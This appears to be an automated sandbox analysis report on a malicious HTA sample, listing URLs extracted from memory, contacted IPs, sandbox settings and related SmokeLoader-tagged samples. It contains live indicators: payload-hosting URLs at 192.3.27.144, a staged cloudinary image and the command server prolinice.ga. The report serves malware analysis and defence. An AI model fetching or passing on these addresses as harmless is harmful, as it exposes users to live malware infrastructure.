                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.1762483774.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1940207997.00000000047C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 0000000E.00000000.1994245178.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1764099136.0000000005A9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 0000000E.00000000.2004435868.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2909647286.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1762483774.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1940207997.00000000047C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    https://wns.windows.com/Lexplorer.exe, 0000000E.00000000.2004435868.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2909647286.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000004.00000002.1762483774.0000000004B87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpgtpowershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://word.office.comexplorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.1762483774.0000000004B87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://prolinice.ga/explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://go.micropowershell.exe, 00000004.00000002.1762483774.00000000051B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 0000000E.00000000.1994245178.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://contoso.com/Iconpowershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://res.cloudinary.com/dnkr4s5yg/image/upload/v173542088powershell.exe, 00000008.00000002.1939177634.0000000002AB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFIpowershell.exe, 00000004.00000002.1766198522.00000000072DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.drfalse
                                                                                high
                                                                                https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.ecosia.org/newtab/explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.drfalse
                                                                                    high
                                                                                    https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://res.cloudinary.compowershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbswscript.exe, 00000007.00000003.1731003803.000000000592F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1731407928.0000000005561000.00000004.00000020.00020000.00000000.sdmp, sweetnessgoodforgreatnessthingswithgood[1].tiff.4.dr, sweetnessgoodforgreatnessthingswith.vbS.4.drfalse
                                                                                                  high
                                                                                                  https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpgpowershell.exe, 00000008.00000002.1939934208.0000000004290000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://android.notify.windows.com/iOSexplorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.1762483774.0000000004B87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 0000000E.00000000.1994245178.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://prolinice.ga/index.phpMozilla/5.0explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2220685342.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2230962875.00000000032E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.2893723974.0000000002CF5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2428964622.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2894572076.0000000002D07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2893893666.00000000008C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2894417010.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2894362131.00000000005B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://outlook.com_explorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://github.com/dahall/taskschedulerpowershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://prolinice.ga:80/index.phposoftexplorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://prolinice.ga/2:iexplorer.exe, 00000011.00000002.2249471749.0000000002CAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://powerpoint.office.comcemberexplorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://contoso.com/Licensepowershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.drfalse
                                                                                                                            high
                                                                                                                            http://schemas.microexplorer.exe, 0000000E.00000002.2903801891.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.2903005039.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2000821408.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://go.microspowershell.exe, 00000004.00000002.1762483774.00000000051B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs0wscript.exe, 00000007.00000003.1728279245.0000000003597000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://prolinice.ga/jexplorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://prolinice.ga/llexplorer.exe, 00000011.00000002.2249471749.0000000002CAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://prolinice.ga/index.phpHexplorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://api.msn.com/qexplorer.exe, 0000000E.00000002.2904691070.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1999335079.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://contoso.com/powershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://github.com/koswald/VBScriptsweetnessgoodforgreatnessthingswith.vbS.4.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1994245178.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882Wpowershell.exe, 00000008.00000002.1971873914.0000000006E09000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1764099136.0000000005A9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFLMEMpowershell.exe, 00000004.00000002.1761871752.0000000002C5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://aka.ms/Vh5j3kexplorer.exe, 0000000E.00000000.1994245178.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://ac.ecosia.org/autocomplete?q=explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 0000000E.00000000.1999335079.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://crl.mpowershell.exe, 00000004.00000002.1767676409.0000000008171000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFuuC:powershell.exe, 00000004.00000002.1767676409.00000000081EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://api.msn.com/explorer.exe, 0000000E.00000002.2904691070.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1999335079.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.msn.com:443/en-us/feedexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                        46.173.214.14
                                                                                                                                                                                        prolinice.gaRussian Federation
                                                                                                                                                                                        47196GARANT-PARK-INTERNETRUtrue
                                                                                                                                                                                        192.3.27.144
                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                        36352AS-COLOCROSSINGUStrue
                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                        Analysis ID:1585851
                                                                                                                                                                                        Start date and time:2025-01-08 11:08:05 +01:00
                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                        Overall analysis duration:0h 8m 8s
                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                        Report type:full
                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                        Number of analysed new started processes analysed:31
                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                        Number of injected processes analysed:1
                                                                                                                                                                                        Technologies:
                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                        Sample name:begoodforeverythinggreatthingsformebetterforgood.hta
                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                        Classification:mal100.phis.bank.troj.spyw.expl.evad.winHTA@41/33@2/2
                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                        • Successful, ratio: 81.2%
                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                        • Successful, ratio: 97%
                                                                                                                                                                                        • Number of executed functions: 179
                                                                                                                                                                                        • Number of non-executed functions: 87
                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                        • Found application associated with file extension: .hta
                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 104.17.202.1, 104.17.201.1, 20.42.73.29, 184.28.90.27, 20.109.210.53, 13.107.246.45, 40.126.31.67
                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, resc.cloudinary.com.cdn.cloudflare.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                        • Execution Graph export aborted for target icgfugf, PID 5844 because it is empty
                                                                                                                                                                                        • Execution Graph export aborted for target icgfugf, PID 7700 because it is empty
                                                                                                                                                                                        • Execution Graph export aborted for target mshta.exe, PID 7452 because there are no executed function
                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                        05:08:55API Interceptor95x Sleep call for process: powershell.exe modified
                                                                                                                                                                                        05:09:36API Interceptor70926x Sleep call for process: explorer.exe modified
                                                                                                                                                                                        05:10:12API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                        10:09:47Task SchedulerRun new task: Firefox Default Browser Agent 186FB1D0F1C89852 path: C:\Users\user\AppData\Roaming\icgfugf
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        192.3.27.144PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta
                                                                                                                                                                                        PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta
                                                                                                                                                                                        PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        prolinice.gabestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
                                                                                                                                                                                        • 46.173.214.24
                                                                                                                                                                                        #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                                                                                                        • 46.173.214.24
                                                                                                                                                                                        veryeasythingsevermadeforcreatenewthignsbetterthigns.htaGet hashmaliciousCobalt Strike, SmokeLoaderBrowse
                                                                                                                                                                                        • 45.91.8.152
                                                                                                                                                                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtfGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                        • 185.251.91.119
                                                                                                                                                                                        40830001.xlsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                        • 185.251.91.119
                                                                                                                                                                                        #20240627_Edlen_B.xlsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                        • 77.232.129.190
                                                                                                                                                                                        171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                        • 77.232.129.190
                                                                                                                                                                                        #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                        • 77.232.129.190
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        GARANT-PARK-INTERNETRUSet-up.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                        • 46.173.214.195
                                                                                                                                                                                        bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
